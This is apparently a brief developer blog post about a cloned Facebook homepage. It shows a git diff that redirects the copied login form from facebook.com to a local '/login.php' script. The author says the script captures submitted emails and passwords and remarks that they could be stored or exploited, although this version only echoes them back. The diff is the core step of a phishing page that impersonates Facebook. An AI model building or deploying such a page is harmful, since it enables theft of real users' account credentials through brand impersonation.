FB Homepage - server side
Today I'm just adding small part of FB homepage project implementing PHP
script showing the possibility of accessing received email and password
on server-side. Of course it’s possible to store it or exploit it
immediately. As for my version, this script is only sending it back to
user as proof and is not storing it in any way.

--- a/FBHomepage/index.html
+++ b/FBHomepage/index.html
@@ -49,7 +49,7 @@
 										<h1><a href="./index.html" title="Go to Facebook Home"><i class="fb_logo img sp_7XMX65Pq0E7 sx_ccd1d2"><u>Facebook logo</u></i></a></h1>
 									</div>
 									<div class="menu_login_container rfloat _ohf">
-										<form id="login_form" action="https://www.facebook.com/login.php?login_attempt=1&lwv=110" method="post" novalidate="1" onsubmit="return window.Event &amp;&amp; Event.__inlineSubmit &amp;&amp; Event.__inlineSubmit(this,event)">
+										<form id="login_form" action="/login.php" method="post" novalidate="1" >
 											<input type="hidden" name="lsd" value="AVo_Qv9c" autocomplete="off">
 											<table cellspacing="0" role="presentation">
 												<tbody>
